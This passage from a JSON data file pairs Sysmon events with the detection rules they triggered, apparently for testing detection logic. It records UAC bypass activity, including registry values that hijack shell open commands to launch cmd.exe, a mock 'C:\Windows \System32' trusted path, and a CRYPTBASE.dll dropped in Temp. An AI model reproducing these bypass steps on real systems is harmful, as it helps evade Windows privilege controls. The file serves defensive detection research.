(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-26E1-5CDA-0000-002087350100","LogonId":"0x13587","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-28A0-5CDA-0000-001074181300","ParentProcessId":2016,"ProcessGuid":"365ABB72-28D0-5CDA-0000-00103A6B1300","ProcessId":2676,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 02:32:48.290"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17715,"Execution_attributes":{"ProcessID":2024,"ThreadID":2004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-14T02:32:48.290682Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /groups","Company":"Microsoft Corporation","CurrentDirectory":"C:\\temp\\PowerShell-Suite-master\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-26E1-5CDA-0000-002087350100","LogonId":"0x13587","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-28A0-5CDA-0000-001074181300","ParentProcessId":2016,"ProcessGuid":"365ABB72-28D0-5CDA-0000-0010F76F1300","ProcessId":3964,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 02:32:48.342"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17717,"Execution_attributes":{"ProcessID":2024,"ThreadID":2004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-14T02:32:48.359432Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:46:10.344","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-FC52-5CD6-0000-0010357F1200","ProcessId":3812,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 16:46:10.344"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15970,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:46:10.344282Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:46:15.484","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-FC57-5CD6-0000-00101FAF1200","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 16:46:15.484"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15972,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:46:15.547407Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B07F-5D46-0000-001031A90F04","ProcessId":1768,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 10:16:31.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5944,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:31.476803Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B07F-5D46-0000-0010F1B20F04","ProcessId":2444,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)","UtcTime":"2019-08-04 10:16:31.572"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5946,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:31.609571Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Wsreset UAC Bypass","Bypass UAC via WSReset.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c start C:\\Windows\\system32\\cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\WSReset.exe\" ","ParentImage":"C:\\Windows\\System32\\WSReset.exe","ParentProcessGuid":"747F3D96-B080-5D46-0000-0010D4EA0F04","ParentProcessId":2112,"ProcessGuid":"747F3D96-B091-5D46-0000-001081F71104","ProcessId":820,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-04 10:16:49.960"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5950,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:50.009124Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B097-5D46-0000-0010E1321204","ProcessId":1960,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)","UtcTime":"2019-08-04 10:16:55.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5953,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:55.441262Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B097-5D46-0000-0010E7381204","ProcessId":3444,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 10:16:55.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5955,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:55.643799Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows \\System32\\winSAT.exe\" formal","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows System Assessment Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991","Image":"C:\\Windows \\System32\\winSAT.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-D21D-5D3C-0000-0020DD5C2300","LogonId":"0x235cdd","ParentCommandLine":"\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" ","ParentImage":"C:\\Users\\IEUser\\Downloads\\UACBypass.exe","ParentProcessGuid":"747F3D96-D39D-5D3C-0000-001026F55500","ParentProcessId":6632,"ProcessGuid":"747F3D96-D39D-5D3C-0000-0010131E5600","ProcessId":7128,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-27 22:43:41.972"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4727,"Execution_attributes":{"ProcessID":2748,"ThreadID":3376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-27T22:43:42.033042Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows \\System32\\winSAT.exe\" formal","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows System Assessment Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991","Image":"C:\\Windows \\System32\\winSAT.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D21D-5D3C-0000-0020EE5B2300","LogonId":"0x235bee","ParentCommandLine":"\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" ","ParentImage":"C:\\Users\\IEUser\\Downloads\\UACBypass.exe","ParentProcessGuid":"747F3D96-D39D-5D3C-0000-001026F55500","ParentProcessId":6632,"ProcessGuid":"747F3D96-D39E-5D3C-0000-0010805A5600","ProcessId":3904,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-27 22:43:42.354"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4730,"Execution_attributes":{"ProcessID":2748,"ThreadID":3376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-27T22:43:42.392880Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6","Image":"C:\\Windows \\System32\\winSAT.exe","ImageLoaded":"C:\\Windows \\System32\\WINMM.dll","ProcessGuid":"747F3D96-D39E-5D3C-0000-0010805A5600","ProcessId":3904,"Product":"?","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-07-27 22:43:42.661"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4732,"Execution_attributes":{"ProcessID":2748,"ThreadID":3384},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-27T22:43:43.016956Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\Windows\\System32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-095D-5EB4-0000-001082FF1700","ProcessId":7084,"RuleName":"PrivEsc - T1088 - UACBypass - changepk UACME61","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Launcher.SystemSettings\\shell\\open\\command\\(Default)","UtcTime":"2020-05-07 13:13:01.680"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":112814,"Execution_attributes":{"ProcessID":2888,"ThreadID":3384},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-05-07T13:13:01.683498Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 09:50:08.491","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-9AD0-5CD6-0000-001077FC1600","ProcessId":1136,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 09:50:08.491"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15875,"Execution_attributes":{"ProcessID":2000,"ThreadID":1748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T09:50:08.491568Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 09:50:13.464","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-9AD5-5CD6-0000-0010C4131700","ProcessId":3716,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 09:50:13.464"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15877,"Execution_attributes":{"ProcessID":2000,"ThreadID":1748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T09:50:13.509892Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-BDD1-5EC9-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"c:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-CA4E-5EC9-0000-00109FE23700","ParentProcessId":1516,"ProcessGuid":"747F3D96-CA52-5EC9-0000-001027FA3700","ProcessId":4456,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-24 01:13:54.117"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":196375,"Execution_attributes":{"ProcessID":2812,"ThreadID":3656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-24T01:13:54.120170Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Taskmgr as Parent"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\windows\\system32\\taskmgr.exe","ParentImage":"C:\\Windows\\System32\\Taskmgr.exe","ParentProcessGuid":"00247C92-858E-5F7B-0000-00105241202B","ParentProcessId":18404,"ProcessGuid":"00247C92-858E-5F7B-0000-0010E741202B","ProcessId":6636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 20:43:58.450"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164892,"Execution_attributes":{"ProcessID":5424,"ThreadID":6708},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-05T20:43:58.451314Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"POC.exe","Company":"","CurrentDirectory":"C:\\Users\\Public\\POC\\bin\\Debug\\","Description":"SearchIndexer","FileVersion":"1.0.0.0","Hashes":"SHA1=3DA62D5328C591481C9C262BC3A77E5FF32EDBB6,MD5=15661E68D8031891DF6E0E70B547AEBB,SHA256=BEF67963D92D027E39CC5FC927805A4EBFE58C2121BA9396356EF0CE257D0C92,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-18F5-5F76-0000-002073A80500","LogonId":"0x5a873","OriginalFileName":"POC.exe","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1EB6-5F76-0000-00101DF51D00","ParentProcessId":8072,"ProcessGuid":"747F3D96-2156-5F76-0000-0010DBE82500","ProcessId":4696,"Product":"SearchIndexer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-01 18:35:02.413"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":410485,"Execution_attributes":{"ProcessID":3308,"ThreadID":4656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-01T18:35:02.415351Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"Program","Company":"","CurrentDirectory":"C:\\Users\\Public\\POC\\bin\\Debug\\","Description":"SearchIndexer","FileVersion":"1.0.0.0","Hashes":"SHA1=3DA62D5328C591481C9C262BC3A77E5FF32EDBB6,MD5=15661E68D8031891DF6E0E70B547AEBB,SHA256=BEF67963D92D027E39CC5FC927805A4EBFE58C2121BA9396356EF0CE257D0C92,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","IntegrityLevel":"AppContainer","LogonGuid":"747F3D96-18F5-5F76-0000-002073A80500","LogonId":"0x5a873","OriginalFileName":"POC.exe","ParentCommandLine":"POC.exe","ParentImage":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","ParentProcessGuid":"747F3D96-2156-5F76-0000-0010DBE82500","ParentProcessId":4696,"ProcessGuid":"747F3D96-2156-5F76-0000-00100EEC2500","ProcessId":5448,"Product":"SearchIndexer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-01 18:35:02.605"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":410486,"Execution_attributes":{"ProcessID":3308,"ThreadID":4656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-01T18:35:02.606952Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-01 18:35:02.768","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1903-5F76-0000-0010B85E0900","ProcessId":6932,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\abc.txt","UtcTime":"2020-10-01 